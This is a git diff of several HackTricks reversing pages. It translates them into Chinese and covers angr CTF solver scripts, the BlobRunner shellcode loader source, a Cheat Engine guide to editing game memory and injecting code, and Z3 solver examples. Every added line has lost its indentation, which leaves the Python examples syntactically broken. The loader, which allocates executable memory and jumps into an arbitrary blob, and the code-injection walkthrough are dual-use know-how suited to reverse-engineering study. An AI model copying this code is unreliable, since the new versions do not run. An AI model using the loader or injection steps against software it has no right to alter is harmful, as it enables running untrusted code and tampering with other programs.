-      # keys to reference the different bitvectors.
-      self.state.globals['solutions'] = (scanf0, scanf1)
+# Now, we want to 'set aside' references to our symbolic values in the
+# globals plugin included by default with a state. You will need to
+# store multiple bitvectors. You can either use a list, tuple, or multiple
+# keys to reference the different bitvectors.
+self.state.globals['solutions'] = (scanf0, scanf1)
 
-  scanf_symbol = '__isoc99_scanf'
-  project.hook_symbol(scanf_symbol, ReplacementScanf())
+scanf_symbol = '__isoc99_scanf'
+project.hook_symbol(scanf_symbol, ReplacementScanf())
 
-  simulation = project.factory.simgr(initial_state)
+simulation = project.factory.simgr(initial_state)
 
-  def is_successful(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Good Job.'.encode() in stdout_output
+def is_successful(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Good Job.'.encode() in stdout_output
 
-  def should_abort(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Try again.'.encode() in stdout_output
+def should_abort(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Try again.'.encode() in stdout_output
 
-  simulation.explore(find=is_successful, avoid=should_abort)
+simulation.explore(find=is_successful, avoid=should_abort)
 
-  if simulation.found:
-    solution_state = simulation.found[0]
+if simulation.found:
+solution_state = simulation.found[0]
 
-    # Grab whatever you set aside in the globals dict.
-    stored_solutions = solution_state.globals['solutions']
-    solution = ' '.join(map(str, map(solution_state.solver.eval, stored_solutions)))
+# Grab whatever you set aside in the globals dict.
+stored_solutions = solution_state.globals['solutions']
+solution = ' '.join(map(str, map(solution_state.solver.eval, stored_solutions)))
 
-    print(solution)
-  else:
-    raise Exception('Could not find the solution')
+print(solution)
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
-### Static Binaries
-
+### 静态二进制文件
 ```python
 # This challenge is the exact same as the first challenge, except that it was
 # compiled as a static binary. Normally, Angr automatically replaces standard
@@ -799,39 +773,37 @@ import angr
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
 
-  initial_state = project.factory.entry_state()
+initial_state = project.factory.entry_state()
 
-  #Find the addresses were the lib functions are loaded in the binary
-  #For example you could find: call   0x804ed80 <__isoc99_scanf>
-  project.hook(0x804ed40, angr.SIM_PROCEDURES['libc']['printf']())
-  project.hook(0x804ed80, angr.SIM_PROCEDURES['libc']['scanf']())
-  project.hook(0x804f350, angr.SIM_PROCEDURES['libc']['puts']())
-  project.hook(0x8048d10, angr.SIM_PROCEDURES['glibc']['__libc_start_main']())
+#Find the addresses were the lib functions are loaded in the binary
+#For example you could find: call   0x804ed80 <__isoc99_scanf>
+project.hook(0x804ed40, angr.SIM_PROCEDURES['libc']['printf']())
+project.hook(0x804ed80, angr.SIM_PROCEDURES['libc']['scanf']())
+project.hook(0x804f350, angr.SIM_PROCEDURES['libc']['puts']())
+project.hook(0x8048d10, angr.SIM_PROCEDURES['glibc']['__libc_start_main']())
 
-  simulation = project.factory.simgr(initial_state)
+simulation = project.factory.simgr(initial_state)
 
-  def is_successful(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Good Job.'.encode() in stdout_output  # :boolean
+def is_successful(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Good Job.'.encode() in stdout_output  # :boolean
 
-  def should_abort(state):
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return 'Try again.'.encode() in stdout_output  # :boolean
+def should_abort(state):
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return 'Try again.'.encode() in stdout_output  # :boolean
 
-  simulation.explore(find=is_successful, avoid=should_abort)
+simulation.explore(find=is_successful, avoid=should_abort)
 
-  if simulation.found:
-    solution_state = simulation.found[0]
-    print(solution_state.posix.dumps(sys.stdin.fileno()).decode())
-  else:
-    raise Exception('Could not find the solution')
+if simulation.found:
+solution_state = simulation.found[0]
+print(solution_state.posix.dumps(sys.stdin.fileno()).decode())
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/reversing-tools-basic-methods/blobrunner.md b/src/reversing/reversing-tools-basic-methods/blobrunner.md
index 88542d62a..260e76697 100644
--- a/src/reversing/reversing-tools-basic-methods/blobrunner.md
+++ b/src/reversing/reversing-tools-basic-methods/blobrunner.md
@@ -1,8 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-The only modified line from the [original code](https://github.com/OALabs/BlobRunner) is the line 10.  
-In order to compile it just **create a C/C++ project in Visual Studio Code, copy and paste the code and build it**.
-
+从[原始代码](https://github.com/OALabs/BlobRunner)中唯一修改的行是第10行。为了编译它，只需**在Visual Studio Code中创建一个C/C++项目，复制并粘贴代码并构建它**。
 ```c
 #include <stdio.h>
 #include <windows.h>
@@ -29,183 +27,181 @@ const char* _banner = " __________.__        ___.  __________\n"
 
 
 void banner() {
-	system("cls");
-	printf(_banner, _version);
-	return;
+system("cls");
+printf(_banner, _version);
+return;
 }
 
 LPVOID process_file(char* inputfile_name, bool jit, int offset, bool debug) {
-	LPVOID lpvBase;
-	FILE* file;
-	unsigned long fileLen;
-	char* buffer;
-	DWORD dummy;
+LPVOID lpvBase;
+FILE* file;
+unsigned long fileLen;
+char* buffer;
+DWORD dummy;
 
-	file = fopen(inputfile_name, "rb");
+file = fopen(inputfile_name, "rb");
 
-	if (!file) {
-		printf(" [!] Error: Unable to open %s\n", inputfile_name);
+if (!file) {
+printf(" [!] Error: Unable to open %s\n", inputfile_name);
 
-		return (LPVOID)NULL;
-	}
+return (LPVOID)NULL;
+}
 
-	printf(" [*] Reading file...\n");
-	fseek(file, 0, SEEK_END);
-	fileLen = ftell(file); //Get Length
+printf(" [*] Reading file...\n");
+fseek(file, 0, SEEK_END);
+fileLen = ftell(file); //Get Length
 
-	printf(" [*] File Size: 0x%04x\n", fileLen);
-	fseek(file, 0, SEEK_SET); //Reset
+printf(" [*] File Size: 0x%04x\n", fileLen);
+fseek(file, 0, SEEK_SET); //Reset
 
-	fileLen += 1;
+fileLen += 1;
 
-	buffer = (char*)malloc(fileLen); //Create Buffer
-	fread(buffer, fileLen, 1, file);
-	fclose(file);
+buffer = (char*)malloc(fileLen); //Create Buffer
+fread(buffer, fileLen, 1, file);
+fclose(file);
 
-	printf(" [*] Allocating Memory...");
+printf(" [*] Allocating Memory...");
 
-	lpvBase = VirtualAlloc(NULL, fileLen, 0x3000, 0x40);
+lpvBase = VirtualAlloc(NULL, fileLen, 0x3000, 0x40);
 
-	printf(".Allocated!\n");
-	printf(" [*]   |-Base: 0x%08x\n", (int)(size_t)lpvBase);
-	printf(" [*] Copying input data...\n");
+printf(".Allocated!\n");
+printf(" [*]   |-Base: 0x%08x\n", (int)(size_t)lpvBase);
+printf(" [*] Copying input data...\n");
 
-	CopyMemory(lpvBase, buffer, fileLen);
-	return lpvBase;
+CopyMemory(lpvBase, buffer, fileLen);
+return lpvBase;
 }
 
 void execute(LPVOID base, int offset, bool nopause, bool jit, bool debug)
 {
-	LPVOID shell_entry;
+LPVOID shell_entry;
 
 #ifdef _WIN64
-	DWORD   thread_id;
-	HANDLE  thread_handle;
-	const char msg[] = " [*] Navigate to the Thread Entry and set a breakpoint. Then press any key to resume the thread.\n";
+DWORD   thread_id;
+HANDLE  thread_handle;
+const char msg[] = " [*] Navigate to the Thread Entry and set a breakpoint. Then press any key to resume the thread.\n";
 #else
-	const char msg[] = " [*] Navigate to the EP and set a breakpoint. Then press any key to jump to the shellcode.\n";
+const char msg[] = " [*] Navigate to the EP and set a breakpoint. Then press any key to jump to the shellcode.\n";
 #endif
 
-	shell_entry = (LPVOID)((UINT_PTR)base + offset);
+shell_entry = (LPVOID)((UINT_PTR)base + offset);
 
 #ifdef _WIN64
 
-	printf(" [*] Creating Suspended Thread...\n");
-	thread_handle = CreateThread(
-		NULL,          // Attributes
-		0,             // Stack size (Default)
-		shell_entry,         // Thread EP
-		NULL,          // Arguments
-		0x4,           // Create Suspended
-		&thread_id);   // Thread identifier
+printf(" [*] Creating Suspended Thread...\n");
+thread_handle = CreateThread(
+NULL,          // Attributes
+0,             // Stack size (Default)
+shell_entry,         // Thread EP
+NULL,          // Arguments
+0x4,           // Create Suspended
+&thread_id);   // Thread identifier
 
-	if (thread_handle == NULL) {
-		printf(" [!] Error Creating thread...");
-		return;
-	}
-	printf(" [*] Created Thread: [%d]\n", thread_id);
-	printf(" [*] Thread Entry: 0x%016x\n", (int)(size_t)shell_entry);
+if (thread_handle == NULL) {
+printf(" [!] Error Creating thread...");
+return;
+}
+printf(" [*] Created Thread: [%d]\n", thread_id);
+printf(" [*] Thread Entry: 0x%016x\n", (int)(size_t)shell_entry);
 
 #endif
 
-	if (nopause == false) {
-		printf("%s", msg);
-		getchar();
-	}
-	else
-	{
-		if (jit == true) {
-			// Force an exception by making the first byte not executable.
-			// This will cause
-			DWORD oldp;
+if (nopause == false) {
+printf("%s", msg);
+getchar();
+}
+else
+{
+if (jit == true) {
+// Force an exception by making the first byte not executable.
+// This will cause
+DWORD oldp;
 
-			printf(" [*] Removing EXECUTE access to trigger exception...\n");
+printf(" [*] Removing EXECUTE access to trigger exception...\n");
 
-			VirtualProtect(shell_entry, 1 , PAGE_READWRITE, &oldp);
-		}
-	}
+VirtualProtect(shell_entry, 1 , PAGE_READWRITE, &oldp);
+}
+}
 
 #ifdef _WIN64
-	printf(" [*] Resuming Thread..\n");
-	ResumeThread(thread_handle);
+printf(" [*] Resuming Thread..\n");
+ResumeThread(thread_handle);
 #else
-	printf(" [*] Entry: 0x%08x\n", (int)(size_t)shell_entry);
-	printf(" [*] Jumping to shellcode\n");
-	__asm jmp shell_entry;
+printf(" [*] Entry: 0x%08x\n", (int)(size_t)shell_entry);
+printf(" [*] Jumping to shellcode\n");
+__asm jmp shell_entry;
 #endif
 }
 
 void print_help() {
-	printf(" [!] Error: No file!\n\n");
-	printf("     Required args: <inputfile>\n\n");
-	printf("     Optional Args:\n");
-	printf("         --offset <offset> The offset to jump into.\n");
-	printf("         --nopause         Don't pause before jumping to shellcode. Danger!!! \n");
-	printf("         --jit             Forces an exception by removing the EXECUTE permission from the alloacted memory.\n");
-	printf("         --debug           Verbose logging.\n");
-	printf("         --version         Print version and exit.\n\n");
+printf(" [!] Error: No file!\n\n");
+printf("     Required args: <inputfile>\n\n");
+printf("     Optional Args:\n");
+printf("         --offset <offset> The offset to jump into.\n");
+printf("         --nopause         Don't pause before jumping to shellcode. Danger!!! \n");
+printf("         --jit             Forces an exception by removing the EXECUTE permission from the alloacted memory.\n");
+printf("         --debug           Verbose logging.\n");
+printf("         --version         Print version and exit.\n\n");
 }
 
 int main(int argc, char* argv[])
 {
-	LPVOID base;
-	int i;
-	int offset = 0;
-	bool nopause = false;
-	bool debug = false;
-	bool jit = false;
-	char* nptr;
+LPVOID base;
+int i;
+int offset = 0;
+bool nopause = false;
+bool debug = false;
+bool jit = false;
+char* nptr;
 
-	banner();
+banner();
 
-	if (argc < 2) {
-		print_help();
-		return -1;
-	}
+if (argc < 2) {
+print_help();
+return -1;
+}
 
-	printf(" [*] Using file: %s \n", argv[1]);
+printf(" [*] Using file: %s \n", argv[1]);
 
-	for (i = 2; i < argc; i++) {
-		if (strcmp(argv[i], "--offset") == 0) {
-			printf(" [*] Parsing offset...\n");
-			i = i + 1;
-			if (strncmp(argv[i], "0x", 2) == 0) {
-			    offset = strtol(argv[i], &nptr, 16);
-            }
-			else {
-			    offset = strtol(argv[i], &nptr, 10);
-			}
-		}
-		else if (strcmp(argv[i], "--nopause") == 0) {
-			nopause = true;
-		}
-		else if (strcmp(argv[i], "--jit") == 0) {
-			jit = true;
-			nopause = true;
-		}
-		else if (strcmp(argv[i], "--debug") == 0) {
-			debug = true;
-		}
-		else if (strcmp(argv[i], "--version") == 0) {
-			printf("Version: %s", _version);
-		}
-		else {
-			printf("[!] Warning: Unknown arg: %s\n", argv[i]);
-		}
-	}
+for (i = 2; i < argc; i++) {
+if (strcmp(argv[i], "--offset") == 0) {
+printf(" [*] Parsing offset...\n");
+i = i + 1;
+if (strncmp(argv[i], "0x", 2) == 0) {
+offset = strtol(argv[i], &nptr, 16);
+}
+else {
+offset = strtol(argv[i], &nptr, 10);
+}
+}
+else if (strcmp(argv[i], "--nopause") == 0) {
+nopause = true;
+}
+else if (strcmp(argv[i], "--jit") == 0) {
+jit = true;
+nopause = true;
+}
+else if (strcmp(argv[i], "--debug") == 0) {
+debug = true;
+}
+else if (strcmp(argv[i], "--version") == 0) {
+printf("Version: %s", _version);
+}
+else {
+printf("[!] Warning: Unknown arg: %s\n", argv[i]);
+}
+}
 
-	base = process_file(argv[1], jit, offset, debug);
-	if (base == NULL) {
-		printf(" [!] Exiting...");
-		return -1;
-	}
-	printf(" [*] Using offset: 0x%08x\n", offset);
-	execute(base, offset, nopause, jit, debug);
-	printf("Pausing - Press any key to quit.\n");
-	getchar();
-	return 0;
+base = process_file(argv[1], jit, offset, debug);
+if (base == NULL) {
+printf(" [!] Exiting...");
+return -1;
+}
+printf(" [*] Using offset: 0x%08x\n", offset);
+execute(base, offset, nopause, jit, debug);
+printf("Pausing - Press any key to quit.\n");
+getchar();
+return 0;
 }
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/reversing-tools-basic-methods/cheat-engine.md b/src/reversing/reversing-tools-basic-methods/cheat-engine.md
index a99760698..c0f8f83a3 100644
--- a/src/reversing/reversing-tools-basic-methods/cheat-engine.md
+++ b/src/reversing/reversing-tools-basic-methods/cheat-engine.md
@@ -2,163 +2,162 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them.\
-When you download and run it, you are **presented** with a **tutorial** of how to use the tool. If you want to learn how to use the tool it's highly recommended to complete it.
+[**Cheat Engine**](https://www.cheatengine.org/downloads.php) 是一个有用的程序，可以找到正在运行的游戏内重要值在内存中的存储位置并进行更改。\
+当你下载并运行它时，你会**看到**一个**教程**，介绍如何使用该工具。如果你想学习如何使用该工具，强烈建议完成这个教程。
 
-## What are you searching?
+## 你在搜索什么？
 
 ![](<../../images/image (762).png>)
 
-This tool is very useful to find **where some value** (usually a number) **is stored in the memory** of a program.\
-**Usually numbers** are stored in **4bytes** form, but you could also find them in **double** or **float** formats, or you may want to look for something **different from a number**. For that reason you need to be sure you **select** what you want to **search for**:
+这个工具非常有用，可以找到**某个值**（通常是一个数字）**在程序内存中的存储位置**。\
+**通常数字**以**4字节**形式存储，但你也可以找到**双精度**或**浮点**格式，或者你可能想寻找一些**不同于数字**的东西。因此，你需要确保你**选择**你想要**搜索的内容**：
 
 ![](<../../images/image (324).png>)
 
-Also you can indicate **different** types of **searches**:
+你还可以指示**不同**类型的**搜索**：
 
 ![](<../../images/image (311).png>)
 
-You can also check the box to **stop the game while scanning the memory**:
+你还可以勾选框以**在扫描内存时停止游戏**：
 
 ![](<../../images/image (1052).png>)
 
-### Hotkeys
+### 热键
 
-In _**Edit --> Settings --> Hotkeys**_ you can set different **hotkeys** for different purposes like **stopping** the **game** (which is quiet useful if at some point you want to scan the memory). Other options are available:
+在 _**编辑 --> 设置 --> 热键**_ 中，你可以为不同的目的设置不同的**热键**，例如**停止**游戏（如果你想在某个时刻扫描内存，这非常有用）。还有其他选项可用：
 
 ![](<../../images/image (864).png>)
 
-## Modifying the value
+## 修改值
 
-Once you **found** where is the **value** you are **looking for** (more about this in the following steps) you can **modify it** double clicking it, then double clicking its value:
+一旦你**找到**你正在**寻找的值**（更多内容在后面的步骤中），你可以通过双击它来**修改**它，然后双击其值：
 
 ![](<../../images/image (563).png>)
 
-And finally **marking the check** to get the modification done in the memory:
+最后**勾选**以在内存中完成修改：
 
 ![](<../../images/image (385).png>)
 
-The **change** to the **memory** will be immediately **applied** (note that until the game doesn't use this value again the value **won't be updated in the game**).
+对**内存**的**更改**将立即**应用**（请注意，直到游戏再次使用此值，该值**不会在游戏中更新**）。
 
-## Searching the value
+## 搜索值
 
-So, we are going to suppose that there is an important value (like the life of your user) that you want to improve, and you are looking for this value in the memory)
+所以，我们假设有一个重要的值（比如你用户的生命值）你想要提高，并且你正在内存中寻找这个值）
 
-### Through a known change
+### 通过已知的变化
 
-Supposing you are looking for the value 100, you **perform a scan** searching for that value and you find a lot of coincidences:
+假设你在寻找值100，你**执行扫描**以搜索该值，并且你发现了很多匹配项：
 
 ![](<../../images/image (108).png>)
 
-Then, you do something so that **value changes**, and you **stop** the game and **perform** a **next scan**:
+然后，你做一些事情使得**值发生变化**，你**停止**游戏并**执行**下一次扫描：
 
 ![](<../../images/image (684).png>)
 
-Cheat Engine will search for the **values** that **went from 100 to the new value**. Congrats, you **found** the **address** of the value you were looking for, you can now modify it.\
-&#xNAN;_&#x49;f you still have several values, do something to modify again that value, and perform another "next scan" to filter the addresses._
+Cheat Engine 将搜索**从100变为新值**的**值**。恭喜你，你**找到了**你正在寻找的**值的地址**，现在你可以修改它。\
+如果你仍然有多个值，做一些事情再次修改该值，并执行另一次“下一次扫描”以过滤地址。
 
-### Unknown Value, known change
+### 未知值，已知变化
 
-In the scenario you **don't know the value** but you know **how to make it change** (and even the value of the change) you can look for your number.
+在你**不知道值**但你知道**如何使其变化**（甚至变化的值）的情况下，你可以寻找你的数字。
 
-So, start by performing a scan of type "**Unknown initial value**":
+所以，首先执行一种类型为“**未知初始值**”的扫描：
 
 ![](<../../images/image (890).png>)
 
-Then, make the value change, indicate **how** the **value** **changed** (in my case it was decreased by 1) and perform a **next scan**:
+然后，使值发生变化，指示**值**是**如何变化的**（在我的例子中是减少了1），并执行**下一次扫描**：
 
 ![](<../../images/image (371).png>)
 
-You will be presented **all the values that were modified in the selected way**:
+你将看到**所有以所选方式被修改的值**：
 
 ![](<../../images/image (569).png>)
 
-Once you have found your value, you can modify it.
+一旦你找到了你的值，你可以修改它。
 
-Note that there are a **lot of possible changes** and you can do these **steps as much as you want** to filter the results:
+请注意，有很多可能的变化，你可以根据需要多次执行这些**步骤**以过滤结果：
 
 ![](<../../images/image (574).png>)
 
-### Random Memory Address - Finding the code
+### 随机内存地址 - 查找代码
 
-Until know we learnt how to find an address storing a value, but it's highly probably that in **different executions of the game that address is in different places of the memory**. So lets find out how to always find that address.
+到目前为止，我们学习了如何找到存储值的地址，但在**不同的游戏执行中，该地址很可能在内存中的不同位置**。所以让我们找出如何始终找到该地址。
 
-Using some of the mentioned tricks, find the address where your current game is storing the important value. Then (stopping the game if you whish) do a **right click** on the found **address** and select "**Find out what accesses this address**" or "**Find out what writes to this address**":
+使用一些提到的技巧，找到当前游戏存储重要值的地址。然后（如果你愿意，可以停止游戏）右键单击找到的**地址**，选择“**查找访问此地址的内容**”或“**查找写入此地址的内容**”：
 
 ![](<../../images/image (1067).png>)
 
-The **first option** is useful to know which **parts** of the **code** are **using** this **address** (which is useful for more things like **knowing where you can modify the code** of the game).\
-The **second option** is more **specific**, and will be more helpful in this case as we are interested in knowing **from where this value is being written**.
+**第一个选项**有助于了解**代码**的**哪些部分**在**使用**此**地址**（这对于更多事情很有用，比如**知道你可以在哪里修改游戏的代码**）。\
+**第二个选项**更为**具体**，在这种情况下更有帮助，因为我们想知道**这个值是从哪里写入的**。
 
-Once you have selected one of those options, the **debugger** will be **attached** to the program and a new **empty window** will appear. Now, **play** the **game** and **modify** that **value** (without restarting the game). The **window** should be **filled** with the **addresses** that are **modifying** the **value**:
+一旦你选择了其中一个选项，**调试器**将**附加**到程序，并且会出现一个新的**空窗口**。现在，**玩**游戏并**修改**该**值**（无需重新启动游戏）。**窗口**应该会**填充**正在**修改**该**值**的**地址**：
 
 ![](<../../images/image (91).png>)
 
-Now that you found the address it's modifying the value you can **modify the code at your pleasure** (Cheat Engine allows you to modify it for NOPs real quick):
+现在你找到了修改值的地址，你可以**随意修改代码**（Cheat Engine 允许你快速将其修改为 NOP）：
 
 ![](<../../images/image (1057).png>)
 
-So, you can now modify it so the code won't affect your number, or will always affect in a positive way.
+因此，你现在可以修改它，使得代码不会影响你的数字，或者总是以积极的方式影响它。
 
-### Random Memory Address - Finding the pointer
+### 随机内存地址 - 查找指针
 
-Following the previous steps, find where the value you are interested is. Then, using "**Find out what writes to this address**" find out which address writes this value and double click on it to get the disassembly view:
+按照之前的步骤，找到你感兴趣的值。然后，使用“**查找写入此地址的内容**”找出哪个地址写入此值，并双击它以获取反汇编视图：
 
 ![](<../../images/image (1039).png>)
 
-Then, perform a new scan **searching for the hex value between "\[]"** (the value of $edx in this case):
+然后，执行新的扫描**搜索“\[]”之间的十六进制值**（在这种情况下是$edx的值）：
 
 ![](<../../images/image (994).png>)
 
-(_If several appear you usually need the smallest address one_)\
-Now, we have f**ound the pointer that will be modifying the value we are interested in**.
+（_如果出现多个，通常需要最小的地址_）\
+现在，我们已经**找到了将修改我们感兴趣的值的指针**。
 
-Click on "**Add Address Manually**":
+点击“**手动添加地址**”：
 
 ![](<../../images/image (990).png>)
 
-Now, click on the "Pointer" check box and add the found address in the text box (in this scenario, the found address in the previous image was "Tutorial-i386.exe"+2426B0):
+现在，勾选“指针”复选框，并在文本框中添加找到的地址（在这种情况下，前一张图片中找到的地址是“Tutorial-i386.exe”+2426B0）：
 
 ![](<../../images/image (392).png>)
 
-(Note how the first "Address" is automatically populated from the pointer address you introduce)
+（注意第一个“地址”是从你输入的指针地址自动填充的）
 
-Click OK and a new pointer will be created:
+点击确定，一个新的指针将被创建：
 
 ![](<../../images/image (308).png>)
 
-Now, every time you modifies that value you are **modifying the important value even if the memory address where the value is is different.**
+现在，每次你修改该值时，即使值所在的内存地址不同，你也在**修改重要值**。
 
-### Code Injection
+### 代码注入
 
-Code injection is a technique where you inject a piece of code into the target process, and then reroute the execution of code to go through your own written code (like giving you points instead of resting them).
+代码注入是一种技术，你将一段代码注入目标进程，然后重新路由代码的执行以通过你自己编写的代码（例如给你积分而不是减少它们）。
 
-So, imagine you have found the address that is subtracting 1 to the life of your player:
+所以，想象一下你找到了一个地址，它正在将1从你的玩家生命中减去：
 
 ![](<../../images/image (203).png>)
 
-Click on Show disassembler to get the **disassemble code**.\
-Then, click **CTRL+a** to invoke the Auto assemble window and select _**Template --> Code Injection**_
+点击显示反汇编以获取**反汇编代码**。\
+然后，点击**CTRL+a**以调用自动汇编窗口并选择 _**模板 --> 代码注入**_
 
 ![](<../../images/image (902).png>)
 
-Fill the **address of the instruction you want to modify** (this is usually autofilled):
+填写**你想要修改的指令的地址**（这通常是自动填充的）：
 
 ![](<../../images/image (744).png>)
 
-A template will be generated:
+将生成一个模板：
 
 ![](<../../images/image (944).png>)
 
-So, insert your new assembly code in the "**newmem**" section and remove the original code from the "**originalcode**" if you don't want it to be executed\*\*.\*\* In this example the injected code will add 2 points instead of substracting 1:
+因此，将你的新汇编代码插入到“**newmem**”部分，并从“**originalcode**”中删除原始代码，如果你不想让它被执行\*\*.\*\* 在这个例子中，注入的代码将增加2点而不是减少1：
 
 ![](<../../images/image (521).png>)
 
-**Click on execute and so on and your code should be injected in the program changing the behaviour of the functionality!**
+**点击执行等等，你的代码应该被注入到程序中，改变功能的行为！**
 
-## **References**
+## **参考**
 
-- **Cheat Engine tutorial, complete it to learn how to start with Cheat Engine**
+- **Cheat Engine 教程，完成它以学习如何开始使用 Cheat Engine**
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
index e093a5889..0e2c77f0f 100644
--- a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
+++ b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
@@ -1,13 +1,12 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-Very basically, this tool will help us to find values for variables that need to satisfy some conditions and calculating them by hand will be so annoying. Therefore, you can indicate to Z3 the conditions the variables need to satisfy and it will find some values (if possible).
+非常基本地，这个工具将帮助我们找到需要满足某些条件的变量的值，手动计算这些值会非常麻烦。因此，您可以向 Z3 指示变量需要满足的条件，它将找到一些值（如果可能的话）。
 
-**Some texts and examples are extracted from [https://ericpony.github.io/z3py-tutorial/guide-examples.htm](https://ericpony.github.io/z3py-tutorial/guide-examples.htm)**
+**一些文本和示例摘自 [https://ericpony.github.io/z3py-tutorial/guide-examples.htm](https://ericpony.github.io/z3py-tutorial/guide-examples.htm)**
 
-# Basic Operations
-
-## Booleans/And/Or/Not
+# 基本操作
 
+## 布尔值/与/或/非
 ```python
 #pip3 install z3-solver
 from z3 import *
@@ -22,9 +21,7 @@ s.add(And(Or(x,y,Not(z)),y))
 s.check() #If response is "sat" then the model is satifable, if "unsat" something is wrong
 print(s.model()) #Print valid values to satisfy the model
 ```
-
-## Ints/Simplify/Reals
-
+## 整数/简化/实数
 ```python
 from z3 import *
 
@@ -44,9 +41,7 @@ print(solve(r1**2 + r2**2 == 3, r1**3 == 2))
 set_option(precision=30)
 print(solve(r1**2 + r2**2 == 3, r1**3 == 2))
 ```
-
-## Printing Model
-
+## 打印模型
 ```python
 from z3 import *
 
@@ -58,13 +53,11 @@ s.check()
 m = s.model()
 print ("x = %s" % m[x])
 for d in m.decls():
-    print("%s = %s" % (d.name(), m[d]))
+print("%s = %s" % (d.name(), m[d]))
 ```
+# 机器算术
 
-# Machine Arithmetic
-
-Modern CPUs and main-stream programming languages use arithmetic over **fixed-size bit-vectors**. Machine arithmetic is available in Z3Py as **Bit-Vectors**.
-
+现代CPU和主流编程语言使用**固定大小位向量**进行算术运算。机器算术在Z3Py中作为**位向量**可用。
 ```python
 from z3 import *
 
@@ -79,11 +72,9 @@ a = BitVecVal(-1, 32)
 b = BitVecVal(65535, 32)
 print(simplify(a == b)) #This is False
 ```
+## 有符号/无符号数字
 
-## Signed/Unsigned Numbers
-
-Z3 provides special signed versions of arithmetical operations where it makes a difference whether the **bit-vector is treated as signed or unsigned**. In Z3Py, the operators **<, <=, >, >=, /, % and >>** correspond to the **signed** versions. The corresponding **unsigned** operators are **ULT, ULE, UGT, UGE, UDiv, URem and LShR.**
-
+Z3 提供了特殊的有符号算术运算版本，在这里 **位向量是被视为有符号还是无符号** 是有区别的。在 Z3Py 中，运算符 **<, <=, >, >=, /, % 和 >>** 对应于 **有符号** 版本。相应的 **无符号** 运算符是 **ULT, ULE, UGT, UGE, UDiv, URem 和 LShR.**
 ```python
 from z3 import *
 
@@ -101,13 +92,11 @@ solve(x < 0)
 # using unsigned version of <
 solve(ULT(x, 0))
 ```
+## 函数
 
-## Functions
-
-**Interpreted functio**ns such as arithmetic where the **function +** has a **fixed standard interpretation** (it adds two numbers). **Uninterpreted functions** and constants are **maximally flexible**; they allow **any interpretation** that is **consistent** with the **constraints** over the function or constant.
-
-Example: f applied twice to x results in x again, but f applied once to x is different from x.
+**解释函数**，例如算术，其中 **函数 +** 具有 **固定的标准解释**（它将两个数字相加）。**未解释函数**和常量是 **最大灵活的**；它们允许与函数或常量的 **约束** 一致的 **任何解释**。
 
+示例：将 f 应用两次于 x 结果再次得到 x，但将 f 应用一次于 x 则与 x 不同。
 ```python
 from z3 import *
 
@@ -126,64 +115,60 @@ s.add(f(x) == 4) #Find the value that generates 4 as response
 s.check()
 print(m.model())
 ```
+# 示例
 
-# Examples
-
-## Sudoku solver
-
+## 数独求解器
 ```python
 # 9x9 matrix of integer variables
 X = [ [ Int("x_%s_%s" % (i+1, j+1)) for j in range(9) ]
-      for i in range(9) ]
+for i in range(9) ]
 
 # each cell contains a value in {1, ..., 9}
 cells_c  = [ And(1 <= X[i][j], X[i][j] <= 9)
-             for i in range(9) for j in range(9) ]
+for i in range(9) for j in range(9) ]
 
 # each row contains a digit at most once
 rows_c   = [ Distinct(X[i]) for i in range(9) ]
 
 # each column contains a digit at most once
 cols_c   = [ Distinct([ X[i][j] for i in range(9) ])
-             for j in range(9) ]
+for j in range(9) ]
 
 # each 3x3 square contains a digit at most once
 sq_c     = [ Distinct([ X[3*i0 + i][3*j0 + j]
-                        for i in range(3) for j in range(3) ])
-             for i0 in range(3) for j0 in range(3) ]
+for i in range(3) for j in range(3) ])
+for i0 in range(3) for j0 in range(3) ]
 
 sudoku_c = cells_c + rows_c + cols_c + sq_c
 
 # sudoku instance, we use '0' for empty cells
 instance = ((0,0,0,0,9,4,0,3,0),
-            (0,0,0,5,1,0,0,0,7),
-            (0,8,9,0,0,0,0,4,0),
-            (0,0,0,0,0,0,2,0,8),
-            (0,6,0,2,0,1,0,5,0),
-            (1,0,2,0,0,0,0,0,0),
-            (0,7,0,0,0,0,5,2,0),
-            (9,0,0,0,6,5,0,0,0),
-            (0,4,0,9,7,0,0,0,0))
+(0,0,0,5,1,0,0,0,7),
+(0,8,9,0,0,0,0,4,0),
+(0,0,0,0,0,0,2,0,8),
+(0,6,0,2,0,1,0,5,0),
+(1,0,2,0,0,0,0,0,0),
+(0,7,0,0,0,0,5,2,0),
+(9,0,0,0,6,5,0,0,0),
+(0,4,0,9,7,0,0,0,0))
 
 instance_c = [ If(instance[i][j] == 0,
-                  True,
-                  X[i][j] == instance[i][j])
-               for i in range(9) for j in range(9) ]
+True,
+X[i][j] == instance[i][j])
+for i in range(9) for j in range(9) ]
 
 s = Solver()
 s.add(sudoku_c + instance_c)
 if s.check() == sat:
-    m = s.model()
-    r = [ [ m.evaluate(X[i][j]) for j in range(9) ]
-          for i in range(9) ]
-    print_matrix(r)
+m = s.model()
